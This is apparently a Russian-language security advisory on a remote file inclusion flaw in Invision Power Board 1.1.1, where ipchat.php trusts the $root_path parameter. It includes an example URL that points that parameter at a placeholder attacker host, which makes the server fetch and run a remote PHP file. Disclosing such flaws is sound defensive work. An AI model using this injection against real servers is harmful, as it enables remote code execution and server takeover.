Уязвимость включения файла обнаружена в Invision Power Board. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на уязвимом сервере.
Сценарий ipchat.php включает файл conf_global.php через переменную $root_path, но не проверяет правильность местоположения файла.
Удаленный пользователь может определить удаленное местоположение для $root_path переменной, чтобы включить удаленно расположенный файл conf_global.php, который будет выполнен на целевом сервере. Пример:
http://[target]/ipchat.php?root_path=http://[attacker]/
http://[attacker]/conf_global.php
Уязвимость обнаружена в Invision Power Board 1.1.1.
